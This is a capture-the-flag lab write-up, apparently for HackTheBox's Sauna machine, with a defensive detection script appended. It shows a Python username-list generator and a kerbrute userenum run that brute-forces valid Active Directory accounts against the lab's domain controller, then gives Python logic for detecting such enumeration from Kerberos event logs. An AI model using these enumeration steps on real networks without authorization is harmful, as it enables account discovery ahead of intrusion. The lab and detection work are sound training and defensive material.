Naming Convention


I was able to extract 2 valid domain users by brute-forcing the target KDC, and the result suggests that the naming convention used is the first letter of FIRSTNAME followed by LASTNAME: hsmith and fsmith

While that was successful, I was also able to get some potential users from the web server

Using the information above, I can craft a list of potential usernames

username_generator.py


import os
import sys
import string
 
 
def main():
	format_text = "Choose username format:" + "\n"
	format_text += "1) hsimpson" + "\n"
	format_text += "2) h.simpson" + "\n"
	format_text += "3) homersimpson" + "\n"
	format_text += "4) homer.simpson" + "\n"
	format_text += "5) hjsimpson" + "\n"
	format_text += "6) homerjsimpson" + "\n"
	format_text += "7) homerjaysimpson" + "\n"
	format_text += "8) homersimpsonb" + "\n"
	format_text += "Option: "
	format_option = input(format_text)
 
	mail_domain = input("Mail domain (example: ...@domain.com) [Default: none]: ")
	domain =      input("Domain (example: domain\\...) [Default: none]: ") if mail_domain == '' else None
 
	names_,surnames_ = None, None
	if format_option == "3" or format_option == "4" or format_option == "6" or format_option == "7" or format_option == "8":
		names = input("Names file path: ")
		if not os.path.isfile(names):
			print("Error: Invalid names file path")
			sys.exit(1)
		# Read one first name per line and close the file afterwards
		with open(names) as f:
			names_ = f.read().splitlines()
 
	surnames = input("Surnames file path: ")
	if not os.path.isfile(surnames):
		print("Error: Invalid surnames file path")
		sys.exit(1)
	# Read one surname per line and close the file afterwards
	with open(surnames) as f:
		surnames_ = f.read().splitlines()
 
	combinations = get_usernames(format_option, names_, surnames_)
	output_file = input("Output file [Default: results.txt]: ") or "results.txt"
	output_to_file(combinations, output_file, mail_domain, domain)
 
 
def get_usernames(format_option, names_, surnames_):
	combinations = []
	letters_ = string.ascii_lowercase
 
	if format_option == "1":
		for s in surnames_:
			for l in letters_:
				combinations.append(l+s)
 
	elif format_option == "2":
		for s in surnames_:
			for l in letters_:
				combinations.append(l+"."+s)
 
	elif format_option == "3":
		for s in surnames_:
			for n in names_:
				combinations.append(n+s)
 
	elif format_option == "4":
		for s in surnames_:
			for n in names_:
				combinations.append(n+"."+s)
 
	elif format_option == "5":
		for s in surnames_:
			for l2 in letters_:
				for l in letters_:
					combinations.append(l+l2+s)
 
	elif format_option == "6":
		for s in surnames_:
			for l in letters_:
				for n in names_:
					combinations.append(n+l+s)
 
	elif format_option == "7":
		for s in surnames_:
			for n2 in names_:
				for n in names_:
					combinations.append(n+n2+s)
 
	elif format_option == "8":
		for s in surnames_:
			for n in names_:
				for l in letters_:
					combinations.append(n+s+l)
 
	else:
		print("Invalid option")
 
	return combinations
 
 
def output_to_file(combinations, output_file, mail_domain, domain):
	with open(output_file , 'w') as f:
		for c in combinations:
			if mail_domain != '':
				f.write("%s\n" % (c+"@"+mail_domain))
			elif domain != '':
				f.write("%s\n" % (domain+"\\"+c))
			else:
				f.write("%s\n" % (c))
 
	print ("Output saved in %s"%(output_file))
 
 
if __name__ == "__main__":
	main()

This is a very simple username generator written in Python

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ python3 ~/Tools/username_generator.py
Choose username format:
1) hsimpson
2) h.simpson
3) homersimpson
4) homer.simpson
5) hjsimpson
6) homerjsimpson
7) homerjaysimpson
8) homersimpsonb
Option: 1
Mail domain (example: ...@domain.com) [Default: none]: 
Domain (example: domain\...) [Default: none]: 
Surnames file path: /home/kali/archive/htb/labs/sauna/lastname
Output file [Default: results.txt]: list.txt
Output saved in list.txt

I am going with option 1, as the naming convention used is the first letter of FIRSTNAME followed by LASTNAME. The output was saved to the list.txt file

I can now use that file containing potential usernames to perform a brute force attack and validate users

Brute Force Attack


┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ kerbrute userenum --dc sauna.egotistical-bank.local -d EGOTISTICAL-BANK.LOCAL ./list.txt 
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
version: v1.0.3 (9dad6e1) - 03/25/23 - Ronnie Flathers @ropnop
 
2023/03/25 17:40:56 >  Using KDC(s):
2023/03/25 17:40:56 >  	sauna.egotistical-bank.local:88
 
2023/03/25 17:40:56 >  [+] VALID USERNAME:	 hsmith@EGOTISTICAL-BANK.LOCAL
2023/03/25 17:40:56 >  [+] VALID USERNAME:	 fsmith@EGOTISTICAL-BANK.LOCAL
2023/03/25 17:41:01 >  Done! Tested 208 usernames (2 valid) in 5.311 seconds

Unfortunately, I am unable to validate any user other than what’s already known. This confirms that none of the users that I found from the web server are domain users
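
Seen from the domain controller, the kerbrute run above is a burst of TGT requests for names that mostly do not exist, and each of those is logged as Event ID 4768 with result code 0x6 when failure auditing for the Kerberos Authentication Service is enabled. The following detection logic is an added example, not part of the original write-up; the event dict shape, the 192.0.2.x addresses, the 60-second window and the threshold of 20 names are assumptions, and the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

UNKNOWN_PRINCIPAL = "0x6"  # KDC_ERR_C_PRINCIPAL_UNKNOWN, as reported in 4768

def detect_user_enum(events, window=timedelta(seconds=60), min_distinct=20):
    """Return {source_ip: peak_distinct_names} for sources that requested TGTs
    for at least min_distinct nonexistent accounts within one sliding window."""
    by_src = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768 and e["Status"].lower() == UNKNOWN_PRINCIPAL:
            when = datetime.fromisoformat(e["TimeCreated"])
            by_src[e["IpAddress"]].append((when, e["TargetUserName"].lower()))
    alerts = {}
    for ip, hits in by_src.items():
        hits.sort()
        start, best = 0, 0
        for end in range(len(hits)):
            # Shrink the window until it spans no more than `window`
            while hits[end][0] - hits[start][0] > window:
                start += 1
            best = max(best, len({user for _, user in hits[start:end + 1]}))
        if best >= min_distinct:
            alerts[ip] = best
    return alerts

def sample_events():
    """Constructed sample: one enumerating host and one user mistyping a name."""
    base = datetime(2023, 1, 1, 12, 0, 0)
    def ev(ip, user, status, offset):
        return {"EventID": 4768, "Status": status, "IpAddress": ip,
                "TargetUserName": user, "TimeCreated": (base + offset).isoformat()}
    events = [ev("192.0.2.10", f"a{i:03d}smith", "0x6", timedelta(milliseconds=25 * i))
              for i in range(206)]
    # A successful TGT request from the same host is not counted
    events.append(ev("192.0.2.10", "hsmith", "0x0", timedelta(seconds=6)))
    # Two typos half an hour apart stay far below the threshold
    events.append(ev("192.0.2.50", "jsmiht", "0x6", timedelta(0)))
    events.append(ev("192.0.2.50", "jsmtih", "0x6", timedelta(minutes=30)))
    return events

if __name__ == "__main__":
    for ip, count in detect_user_enum(sample_events()).items():
        print(f"possible Kerberos user enumeration from {ip}: {count} unknown names")
```

Counting distinct names rather than raw failures keeps a single misconfigured service that retries one stale account from triggering the alert.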